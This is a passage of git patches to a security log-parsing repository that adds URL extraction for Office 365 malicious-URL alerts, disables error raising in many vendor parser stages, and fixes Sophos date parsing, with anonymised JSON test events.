alert\",\"Data\":\"{\\\"etype\\\":\\\"MaliciousUrl\\\",\\\"aii\\\":\\\"d6c7276b-3a65-43c7-9e25-525f7e289543\\\",\\\"eid\\\":\\\"https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh\\\",\\\"curlh\\\":\\\"12815939189066485645\\\",\\\"tid\\\":\\\"b76bf78d-7696-4b17-bbda-e9995c266879\\\",\\\"ts\\\":\\\"2024-10-07T20:07:11.0000000Z\\\",\\\"te\\\":\\\"2024-10-07T20:07:11.0000000Z\\\",\\\"trc\\\":\\\"test.user@example.org\\\",\\\"tdc\\\":\\\"1\\\",\\\"at\\\":\\\"2024-10-07T20:07:11.0000000Z\\\",\\\"dm\\\":\\\"MDO Safe Links\\\",\\\"ot\\\":\\\"Allowed\\\",\\\"od\\\":\\\"User clicked on a URL which was identified as potentially malicious at a later time.\\\",\\\"md\\\":\\\"2024-10-07T20:29:25.5945545Z\\\",\\\"lon\\\":\\\"MaliciousUrlClick\\\"}\",\"EntityType\":\"MaliciousUrl\",\"Name\":\"A potentially malicious URL click was detected\",\"PolicyId\":\"471d921d-e417-41c4-be33-ad67040f3ece\",\"Severity\":\"High\",\"Source\":\"Office 365 Security & Compliance\",\"Status\":\"Active\"}",
+    "event": {
+      "action": "AlertEntityGenerated",
+      "category": [
+        "intrusion_detection"
+      ],
+      "code": "40",
+      "kind": "alert",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-07T20:29:25Z",
+    "action": {
+      "id": 40,
+      "name": "AlertEntityGenerated",
+      "outcome": "success",
+      "target": "user"
+    },
+    "email": {
+      "to": {
+        "address": [
+          "test.user@example.org"
+        ]
+      }
+    },
+    "office365": {
+      "alert": {
+        "category": "ThreatManagement",
+        "display_name": "A potentially malicious URL click was detected",
+        "entity_type": "MaliciousUrl",
+        "id": "657fb16a-ee7f-4939-a218-33ba3c72805e",
+        "severity": "High",
+        "source": "Office 365 Security & Compliance",
+        "status": "Active"
+      },
+      "audit": {
+        "object_id": "https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh"
+      },
+      "record_type": 40,
+      "result_status": "Succeeded",
+      "user_type": {
+        "code": 4,
+        "name": "System"
+      }
+    },
+    "organization": {
+      "id": "b76bf78d-7696-4b17-bbda-e9995c266879"
+    },
+    "related": {
+      "user": [
+        "SecurityComplianceAlerts"
+      ]
+    },
+    "rule": {
+      "id": "471d921d-e417-41c4-be33-ad67040f3ece"
+    },
+    "service": {
+      "name": "SecurityComplianceCenter"
+    },
+    "user": {
+      "id": "SecurityComplianceAlerts",
+      "name": "SecurityComplianceAlerts"
+    }
+  }
+}
\ No newline at end of file

From e9ea0512c9e02727806726c68d2928f991bb3b22 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?=
 <129874202+gcl-sekoia@users.noreply.github.com>
Date: Tue, 29 Oct 2024 14:19:03 +0100
Subject: [PATCH 180/317] fix(o365): Add parsing of URLs in
 SecurityComplianceAlert with MaliciousUrl

---
 Office 365/o365/ingest/parser.yml                     |  4 ++++
 .../security_compliance_alert_malicious_url.json      | 11 +++++++++++
 2 files changed, 15 insertions(+)

diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index e5a34547a..414bbb996 100644
--- a/Office 365/o365/ingest/parser.yml	
+++ b/Office 365/o365/ingest/parser.yml	
@@ -654,6 +654,10 @@ stages:
           url.original: "//{{parse_data.ParsedData.pud}}"
         filter: "{{parse_data.ParsedData.pud[0] != None}}"
 
+      - set:
+          url.original: "{{json_event.message.ObjectId}}"
+        filter: "{{json_event.message.EntityType == 'MaliciousUrl'}}"
+
   parse_power_bi:
     actions:
       - set:
diff --git a/Office 365/o365/tests/security_compliance_alert_malicious_url.json b/Office 365/o365/tests/security_compliance_alert_malicious_url.json
index 83d6877e6..7bb99fa1d 100644
--- a/Office 365/o365/tests/security_compliance_alert_malicious_url.json	
+++ b/Office 365/o365/tests/security_compliance_alert_malicious_url.json	
@@ -70,6 +70,17 @@
     "service": {
       "name": "SecurityComplianceCenter"
     },
+    "url": {
+      "domain": "test-d7a3.evil.net",
+      "original": "https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh",
+      "path": "/",
+      "port": 443,
+      "query": "param=SGVsbG8gV29ybGQh",
+      "registered_domain": "evil.net",
+      "scheme": "https",
+      "subdomain": "test-d7a3",
+      "top_level_domain": "net"
+    },
     "user": {
       "id": "SecurityComplianceAlerts",
       "name": "SecurityComplianceAlerts"

From 953905eee39649d029701aaf6ecd0e1edd7ec607 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Tue, 29 Oct 2024 15:18:52 +0200
Subject: [PATCH 181/317] Add `raise_errors`

---
 F5 Networks/f5-big-ip/ingest/parser.yml                  | 4 ++++
 Fastly/fastly-waf-auditlogs/ingest/parser.yml            | 1 +
 Fortinet/fortimail/ingest/parser.yml                     | 9 +++++++++
 Google Cloud/Google Cloud Audit/ingest/parser.yml        | 1 +
 .../Google Cloud Load Balancing/ingest/parser.yml        | 1 +
 Google Cloud/Google Kubernetes Engine/ingest/parser.yml  | 1 +
 IBM/ibm_i/ingest/parser.yml                              | 1 +
 Ivanti/pulse-connect/ingest/parser.yml                   | 1 +
 Lacework/lacework-cloud-security/ingest/parser.yml       | 1 +
 Netskope/netskope_events/ingest/parser.yml               | 1 +
 Office 365/o365/ingest/parser.yml                        | 2 ++
 OpenLDAP/openldap/ingest/parser.yml                      | 3 +++
 OpenSSH/openssh/ingest/parser.yml                        | 1 +
 OpenVPN/openvpn/ingest/parser.yml                        | 1 +
 Postfix/postfix/ingest/parser.yml                        | 5 +++++
 15 files changed, 33 insertions(+)

diff --git a/F5 Networks/f5-big-ip/ingest/parser.yml b/F5 Networks/f5-big-ip/ingest/parser.yml
index d59682c69..0147bdd4b 100644
--- a/F5 Networks/f5-big-ip/ingest/parser.yml	
+++ b/F5 Networks/f5-big-ip/ingest/parser.yml	
@@ -62,6 +62,7 @@ pipeline:
     external:
       name: kv.parse-kv
       properties:
+        raise_errors: false
         input_field: '{{ parse_cef_event.message.full_request.replace("\\r\\n", "\r\n") }}'
         output_field: message
         value_sep: ": "
@@ -81,6 +82,7 @@ pipeline:
     external:
       name: kv.parse-kv
       properties:
+        raise_errors: false
         input_field: "{{ parse_kv_header.message.kvs }}"
         output_field: message
         value_sep: "="
@@ -91,6 +93,7 @@ pipeline:
     external:
       name: kv.parse-kv
       properties:
+        raise_errors: false
         input_field: "{{ parse_grok_event.message.audit_message }}"
         output_field: message
         value_sep: "="
@@ -109,6 +112,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         output_field: message
         pattern: '%{HEADER}?%{DATA:rule_name}\:\s*%{WORD}\:\s*%{WORD}\:\s*%{PAYLOAD}'
         custom_patterns:
diff --git a/Fastly/fastly-waf-auditlogs/ingest/parser.yml b/Fastly/fastly-waf-auditlogs/ingest/parser.yml
index 8edda0283..92b35dd82 100644
--- a/Fastly/fastly-waf-auditlogs/ingest/parser.yml
+++ b/Fastly/fastly-waf-auditlogs/ingest/parser.yml
@@ -11,6 +11,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parsed_event.message.message}}"
         output_field: message
         pattern: '%{DATA:user_name} \(%{DATA:user_email}\) %{GREEDYDATA:user_action}'
diff --git a/Fortinet/fortimail/ingest/parser.yml b/Fortinet/fortimail/ingest/parser.yml
index f57bd8dcd..befdd3605 100644
--- a/Fortinet/fortimail/ingest/parser.yml
+++ b/Fortinet/fortimail/ingest/parser.yml
@@ -11,6 +11,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: parsed_event.message.msg
         output_field: file
         pattern: '%{DATA:type} name: %{DATA:name}(\(checksum:%{DATA:hash}\))?, scanned by Antivirus Scanner\(%{DATA:event_status}\)(, Content Filter\(clean\))?'
@@ -19,6 +20,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: parsed_event.message.msg
         output_field: msg
         pattern: "STARTTLS=server, cert-subject=%{GREEDYDATA:tls_server_subject}, cert-issuer=%{GREEDYDATA:tls_server_issuer}, verifymsg=%{GREEDYDATA:event_reason}"
@@ -28,6 +30,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: parsed_event.message.msg
         output_field: msg
         pattern: "%{URL_FULL_SPAM}|%{URL_FULL_1}|%{URL_ORIGINAL_1}|%{URL_ORIGINAL_2}"
@@ -41,6 +44,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: parsed_event.message.msg
         output_field: msg
         pattern: "STARTTLS=client, cert-subject=%{GREEDYDATA:tls_client_subject}, cert-issuer=%{GREEDYDATA:tls_client_issuer}, verifymsg=%{GREEDYDATA:event_reason}"
@@ -50,6 +54,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: parsed_event.message.msg
         output_field: msg
         pattern: '%{DATA:file_type} %{DATA:file_name}\s\(checksum: %{DATA:file_hash_sha256}\) has been scanned by FortiSandbox.( Scan result: rating=%{GREEDYDATA:tmp_event_status})?'
@@ -59,6 +64,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: parsed_event.message.msg
         output_field: msg
         pattern: "to=%{DATA:email_to}, (delay=%{DATA:tmp_delay}, )?(xdelay=%{DATA:tmp_xdelay}, )?(mailer=%{DATA:tmp_mailer}, )?(pri=%{NUMBER:tmp_priority_level_msg}, )?(relay=%{RELAY_INFO:relay}, )?(dsn=%{DATA:tmp_dsn_version}, )?stat=%{GREEDYDATA:event_reason}"
@@ -70,6 +76,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: parsed_event.message.msg
         output_field: msg
         pattern: "FortiGuard-WebFilter identified URL: %{DATA:url_full}, category: %{DATA:tmp_spam_category}, id: %{GREEDYDATA:tmp_spam_id}."
@@ -89,6 +96,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: parsed_event.message.ui
         output_field: msg
         pattern: '%{DATA}\(%{IP:source_ip}\)'
@@ -97,6 +105,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: parse_event_with_no_stat.msg.relay
         output_field: msg
         pattern: "%{RELAY:relay}"
diff --git a/Google Cloud/Google Cloud Audit/ingest/parser.yml b/Google Cloud/Google Cloud Audit/ingest/parser.yml
index d2c879c05..724189e6f 100644
--- a/Google Cloud/Google Cloud Audit/ingest/parser.yml	
+++ b/Google Cloud/Google Cloud Audit/ingest/parser.yml	
@@ -9,6 +9,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{json_event.message.protoPayload.authenticationInfo.principalEmail}}"
         output_field: message
         pattern: "%{EMAILADDRESS:email}"
diff --git a/Google Cloud/Google Cloud Load Balancing/ingest/parser.yml b/Google Cloud/Google Cloud Load Balancing/ingest/parser.yml
index 070f71fc4..71f75f593 100644
--- a/Google Cloud/Google Cloud Load Balancing/ingest/parser.yml	
+++ b/Google Cloud/Google Cloud Load Balancing/ingest/parser.yml	
@@ -9,6 +9,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parsed_event.message.httpRequest.remoteIp}}"
         output_field: message
         pattern: "%{IP:source_ip}|%{IP:source_ip}:%{NUMBER:source_port}"
diff --git a/Google Cloud/Google Kubernetes Engine/ingest/parser.yml b/Google Cloud/Google Kubernetes Engine/ingest/parser.yml
index 3e5ae4ae5..b7bdf0fe1 100644
--- a/Google Cloud/Google Kubernetes Engine/ingest/parser.yml	
+++ b/Google Cloud/Google Kubernetes Engine/ingest/parser.yml	
@@ -9,6 +9,7 @@ pipeline:
     external:
       name: kv.parse-kv
       properties:
+        raise_errors: false
         input_field: "{{ json_event.message.jsonPayload.MESSAGE }}"
         value_sep: "="
         item_sep: \s
diff --git a/IBM/ibm_i/ingest/parser.yml b/IBM/ibm_i/ingest/parser.yml
index b14b09cc5..ffae36257 100644
--- a/IBM/ibm_i/ingest/parser.yml
+++ b/IBM/ibm_i/ingest/parser.yml
@@ -16,6 +16,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: parsed_event.message.msg
         output_field: message
         pattern: "%{CPF1164}|%{CPI3E34}"
diff --git a/Ivanti/pulse-connect/ingest/parser.yml b/Ivanti/pulse-connect/ingest/parser.yml
index 7e1db659a..827dd8820 100644
--- a/Ivanti/pulse-connect/ingest/parser.yml
+++ b/Ivanti/pulse-connect/ingest/parser.yml
@@ -10,6 +10,7 @@ pipeline:
     external:
       name: grok.case_match
       properties:
+        raise_errors: false
         input_field: "{{kv_event.message.msg}}"
         output_field: details
         pattern_key: "{{field_extraction.event.code}}"
diff --git a/Lacework/lacework-cloud-security/ingest/parser.yml b/Lacework/lacework-cloud-security/ingest/parser.yml
index 0b0d805e1..28e7e1a67 100644
--- a/Lacework/lacework-cloud-security/ingest/parser.yml
+++ b/Lacework/lacework-cloud-security/ingest/parser.yml
@@ -7,6 +7,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{json_event.message.alertInfo.description}}"
         output_field: message
         pattern: "%{HEADER}?\\s*(%{FIRST_USER}|%{AWS_ACCOUNT}|%{FIRST_SERVICE}|%{SIGHTING_USER})\\s*"
diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml
index 471b39627..1c33c07bc 100644
--- a/Netskope/netskope_events/ingest/parser.yml
+++ b/Netskope/netskope_events/ingest/parser.yml
@@ -16,6 +16,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parsed_event.message.user}}"
         output_field: result
         pattern: "%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name}"
diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index 90f07c4ca..5d3b587df 100644
--- a/Office 365/o365/ingest/parser.yml	
+++ b/Office 365/o365/ingest/parser.yml	
@@ -14,6 +14,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{json_event.message.ClientIP}}"
         output_field: result
         pattern: '::ffff:%{IP:ip}|%{IP:ip}(:%{INT:port})?|\[%{IP:ip}\](:%{INT:port})?'
@@ -22,6 +23,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{json_event.message.ClientIPAddress}}"
         output_field: result
         pattern: "::ffff:%{IP:ip}|%{IP:ip}(:%{INT:port})?"
diff --git a/OpenLDAP/openldap/ingest/parser.yml b/OpenLDAP/openldap/ingest/parser.yml
index 537b0c7da..8c87b56f1 100644
--- a/OpenLDAP/openldap/ingest/parser.yml
+++ b/OpenLDAP/openldap/ingest/parser.yml
@@ -14,6 +14,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{pre_parsing.pre_message.raw_message}}"
         output_field: message
         pattern: "%{Group_1}?"
@@ -25,6 +26,7 @@ pipeline:
     external:
       name: kv.parse-kv
       properties:
+        raise_errors: false
         input_field: "{{pre_parsing.pre_message.raw_message}}"
         output_field: parse_kv_field
         value_sep: "="
@@ -35,6 +37,7 @@ pipeline:
     external:
       name: kv.parse-kv
       properties:
+        raise_errors: false
         input_field: "{{parse_kv.parse_kv_field.dn}}"
         output_field: result
         value_sep: "="
diff --git a/OpenSSH/openssh/ingest/parser.yml b/OpenSSH/openssh/ingest/parser.yml
index 53d8da2b0..6bc478455 100644
--- a/OpenSSH/openssh/ingest/parser.yml
+++ b/OpenSSH/openssh/ingest/parser.yml
@@ -129,6 +129,7 @@ pipeline:
     external:
       name: kv.parse-kv
       properties:
+        raise_errors: false
         input_field: "{{event.message.pam}}"
         output_field: message
         value_sep: "="
diff --git a/OpenVPN/openvpn/ingest/parser.yml b/OpenVPN/openvpn/ingest/parser.yml
index e22379d0b..1101b175d 100644
--- a/OpenVPN/openvpn/ingest/parser.yml
+++ b/OpenVPN/openvpn/ingest/parser.yml
@@ -53,6 +53,7 @@ pipeline:
     external:
       name: kv.parse-kv
       properties:
+        raise_errors: false
         input_field: "{{parsed_event.message.ldap_kvs}}"
         output_field: message
         value_sep: "="
diff --git a/Postfix/postfix/ingest/parser.yml b/Postfix/postfix/ingest/parser.yml
index e2982cf2b..b6987c83d 100644
--- a/Postfix/postfix/ingest/parser.yml
+++ b/Postfix/postfix/ingest/parser.yml
@@ -224,6 +224,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{event.message.postfix_keyvalue_data}}"
         output_field: result
         pattern: "%{PARSE_RELAY_1}|%{PARSE_RELAY_2}"
@@ -275,6 +276,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parsed_message_kv.message.from}}"
         output_field: message
         pattern: ".*?%{EMAILADDRESS:postfix_from}.*"
@@ -284,6 +286,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parsed_message_kv.message.to}}"
         output_field: message
         pattern: ".*?%{EMAILADDRESS:postfix_to}.*"
@@ -293,6 +296,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{event.message.postfix_smtp_response}}"
         output_field: "message"
         pattern: '.*?%{HOSTNAME:source_domain}?\[%{IP:source_address}\](:%{INT:source_port})?.*'
@@ -302,6 +306,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{event.message.postfix_message}}"
         output_field: "message"
         pattern: '.*?%{HOSTNAME:source_domain}?\[%{IP:source_address}\](:%{INT:source_port})?.*'

From c9c6e8c618463bad094ea3e43cf6ab6173826415 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Wed, 30 Oct 2024 10:44:27 +0200
Subject: [PATCH 182/317] Fix: Sophos parse date statement

---
 .../ingest/parser.yml                         |   2 +-
 .../tests/ioc_view_query7.json                | 104 ++++++++++++++++++
 2 files changed, 105 insertions(+), 1 deletion(-)
 create mode 100644 Sophos/sophos-analysis-threat-center/tests/ioc_view_query7.json

diff --git a/Sophos/sophos-analysis-threat-center/ingest/parser.yml b/Sophos/sophos-analysis-threat-center/ingest/parser.yml
index 4b1f2231c..31f33975f 100644
--- a/Sophos/sophos-analysis-threat-center/ingest/parser.yml
+++ b/Sophos/sophos-analysis-threat-center/ingest/parser.yml
@@ -53,7 +53,7 @@ pipeline:
       properties:
         input_field: "{{parse_json.message.password_last_set}}"
         output_field: date
-    filter: '{{parse_json.message.get("password_last_set") not in [None, "-"] }}'
+    filter: '{{parse_json.message.get("password_last_set") not in [None, "-"] and not parse_json.message.get("password_last_set").startswith("%%") }}'
 
   - name: parsed_unix_date
     external:
diff --git a/Sophos/sophos-analysis-threat-center/tests/ioc_view_query7.json b/Sophos/sophos-analysis-threat-center/tests/ioc_view_query7.json
new file mode 100644
index 000000000..261672aa9
--- /dev/null
+++ b/Sophos/sophos-analysis-threat-center/tests/ioc_view_query7.json
@@ -0,0 +1,104 @@
+{
+  "input": {
+    "message": "{\n  \"upload_size\": 1406,\n  \"profile_path\": \"%%XXXX\",\n  \"record_identifier\": \"xxxxxxxxx01xxxxxxxxxxxxxxxxxxxxx\",\n  \"ioc_severity\": 4,\n  \"handler_verdicts_case_descriptions\": {\n    \"default\": \"{\\\"correlated_reason_id\\\":\\\"\\\",\\\"created_reason_id\\\":\\\"\\\"}\"\n  },\n  \"user_parameters\": \"%%XXXX\",\n  \"folded\": 0,\n  \"meta_mac_address\": \"c5:1a:64:c1:65:3a\",\n  \"endpoint_id\": \"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\",\n  \"handler_verdict_suppression_mdr\": false,\n  \"meta_public_ip_country_code\": \"FR\",\n  \"schema_version\": \"24\",\n  \"subject_logon_id\": \"0x3e7\",\n  \"ioc_detection_mitre_attack\": \"[]\",\n  \"handler_verdicts_entities\": \"[{\\\"attributes\\\":{\\\"domain_controller\\\":\\\"False\\\",\\\"endpoint_type\\\":\\\"computer\\\",\\\"hostname\\\":\\\"XXXX-XXXXXXXX\\\",\\\"id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"os_platform\\\":\\\"windows\\\",\\\"os_type\\\":\\\"\\\"},\\\"id\\\":\\\"b5c47470231d356f5cf8d90a31999db59172206adef7958ec9c650b9ce99147b\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"device\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.4\\\",\\\"external\\\":true,\\\"id\\\":\\\"263522d8b9d989b8c304a6d2f088f107b6ee0010675a11fb459b326eb27edefd\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"46ce85dc0d61d3ddc073e7a66074a8add18e75b082eef550e08863895dcbadb0\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.1\\\",\\\"external\\\":false,\\\"id\\\":\\\"ead232f295b08325f6b65bd85a8454239cd479ef30e470f594f2fcb628ec3d64\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"a2bf7ac1f3a3e09342ef4510b4d63f53100334262aa0fe8eef47a0e3642a34fe\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"}]\",\n  \"user_workstations\": \"%%XXXX\",\n  \"meta_licence\": \"MTR\",\n  \"ioc_detection_experiment_level\": 0,\n  \"privilege_list\": \"-\",\n  \"ioc_created_at\": \"2024-10-22T14:41:22.595Z\",\n  \"ingestion_timestamp\": \"2024-10-22T14:41:09.572Z\",\n  \"home_directory\": \"%%XXXX\",\n  \"ioc_detection_attack\": \"Suspicious Activity\",\n  \"numerics\": false,\n  \"eventid\": 4738,\n  \"meta_public_ip\": \"1.2.3.4\",\n  \"counter\": 0,\n  \"detection_id_dedup\": \"detectionIdDedup-xxxxxxxxxxxxxxx\",\n  \"password_last_set\": \"%%1794\",\n  \"meta_hostname\": \"XXXX-XXXXXXXX\",\n  \"ioc_detection_references\": \"[\\\"https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738\\\"]\",\n  \"ioc_worker_name\": \"Security Event Service\",\n  \"ioc_detection_type\": \"Threat\",\n  \"ioc_detection_category\": \"Threat\",\n  \"ioc_unix_time\": \"2024-10-22T14:40:48.000Z\",\n  \"epoch\": 1729607690,\n  \"meta_ip_mask\": \"255.255.252.0\",\n  \"ioc_worker_id\": \"security-event-service\",\n  \"handler_verdict_suppression_xdr\": false,\n  \"unix_time\": \"2024-10-22T14:40:48.000Z\",\n  \"ioc_log_type\": \"summary\",\n  \"query_source\": \"xdr_only\",\n  \"host_identifier\": \"hostIdentifier-xxxxxxxxxxxxxxx\",\n  \"partition_bucket\": \"87\",\n  \"home_path\": \"%%XXXX\",\n  \"meta_public_ip_country\": \"France\",\n  \"meta_boot_time\": 1729607865,\n  \"subject_username\": \"XXXX-XXXXXXXX$\",\n  \"handler_verdicts_detection_descriptions\": {\n    \"default\": \"{\\\"created_reason_id\\\":\\\"WIN-EVENT-4738\\\",\\\"significance_id\\\":\\\"WIN-EVENT-4738\\\"}\"\n  },\n  \"meta_os_name\": \"Microsoft Windows 11 Professionnel\",\n  \"osquery_action\": \"added\",\n  \"script_path\": \"%%XXXX\",\n  \"account_expires\": \"%%1794\",\n  \"meta_query_pack_version\": \"1.21.26\",\n  \"subject_domain\": \"ACOSS\",\n  \"handler_verdict_suppression\": false,\n  \"calendar_time\": \"2024-10-22T14:40:48.000Z\",\n  \"meta_eid\": \"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\",\n  \"meta_public_ip_longitude\": 2.3387,\n  \"ioc_detection_id\": \"WIN-EVENT-4738\",\n  \"meta_os_platform\": \"windows\",\n  \"meta_username\": \"\",\n  \"detection_identifier\": \"xxxxxxxxx01xxxxxxxxxxxxxxxxxxxxx_detectionIdDedup-xxxxxxxxxxxxxxx\",\n  \"handler_verdict_escalation\": false,\n  \"query_name\": \"windows_event_user_account_changed\",\n  \"provider_name\": \"Microsoft-Windows-Security-Auditing\",\n  \"meta_os_type\": \"\",\n  \"meta_os_version\": \"10.0.22631\",\n  \"sam_account_name\": \"TestUser\",\n  \"meta_public_ip_latitude\": 48.8582,\n  \"source\": \"Security\",\n  \"ioc_detection_licenses\": \"[\\\"MTR\\\",\\\"XDR\\\"]\",\n  \"user_principal_name\": \"-\",\n  \"description\": \"A User Account was changed\",\n  \"meta_aggressive_activity\": \"False\",\n  \"meta_ip_address\": \"1.2.3.1\",\n  \"handler_verdicts\": \"{\\\"default\\\":{\\\"correlation\\\":{\\\"correlate\\\":false,\\\"correlationIds\\\":null,\\\"id\\\":\\\"hostIdentifier-xxxxxxxxxxxxxxx111-xxxx-xxxxx-xxxxxx111111\\\"},\\\"escalation\\\":false,\\\"labels\\\":[],\\\"matched_rules\\\":[{\\\"description\\\":\\\"Define the mutation data structure for subsequent mutation rules to reference\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"define_mutation_structure\\\"},{\\\"description\\\":\\\"rule to normalize osquery detections\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"normalize_osquery_detections\\\"},{\\\"description\\\":\\\"Update the description in handler verdicts to add detection id\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"add_detection_id\\\"},{\\\"description\\\":\\\"Correlate Osquery detections on customer ID and host ID\\\",\\\"kb\\\":\\\"correlation\\\",\\\"name\\\":\\\"osquery_correlation_id\\\"}],\\\"mutations\\\":{\\\"descriptions\\\":{\\\"case_descriptions\\\":{\\\"correlated_reason_id\\\":\\\"\\\",\\\"created_reason_id\\\":\\\"\\\"},\\\"detection_descriptions\\\":{\\\"created_reason_id\\\":\\\"WIN-EVENT-4738\\\",\\\"significance_id\\\":\\\"WIN-EVENT-4738\\\"}},\\\"entities\\\":[{\\\"attributes\\\":{\\\"domain_controller\\\":\\\"False\\\",\\\"endpoint_type\\\":\\\"computer\\\",\\\"hostname\\\":\\\"XXXX-XXXXXXXX\\\",\\\"id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"os_platform\\\":\\\"windows\\\",\\\"os_type\\\":\\\"\\\"},\\\"id\\\":\\\"b5c47470231d356f5cf8d90a31999db59172206adef7958ec9c650b9ce99147b\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"device\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.4\\\",\\\"external\\\":true,\\\"id\\\":\\\"263522d8b9d989b8c304a6d2f088f107b6ee0010675a11fb459b326eb27edefd\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"46ce85dc0d61d3ddc073e7a66074a8add18e75b082eef550e08863895dcbadb0\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.1\\\",\\\"external\\\":false,\\\"id\\\":\\\"ead232f295b08325f6b65bd85a8454239cd479ef30e470f594f2fcb628ec3d64\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"a2bf7ac1f3a3e09342ef4510b4d63f53100334262aa0fe8eef47a0e3642a34fe\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"}],\\\"labels\\\":[]},\\\"rule_hits\\\":[],\\\"rule_hits_summary\\\":{\\\"correlation\\\":[\\\"osquery_correlation_id\\\"],\\\"escalation\\\":[],\\\"mutation\\\":[\\\"define_mutation_structure\\\",\\\"normalize_osquery_detections\\\",\\\"add_detection_id\\\"],\\\"suppression\\\":[]},\\\"suppression\\\":false},\\\"mdr\\\":{\\\"correlation\\\":{\\\"correlate\\\":false,\\\"correlationIds\\\":null,\\\"id\\\":\\\"\\\"},\\\"escalation\\\":false,\\\"labels\\\":[],\\\"matched_rules\\\":[{\\\"description\\\":\\\"Define the mutation data structure for subsequent mutation rules to 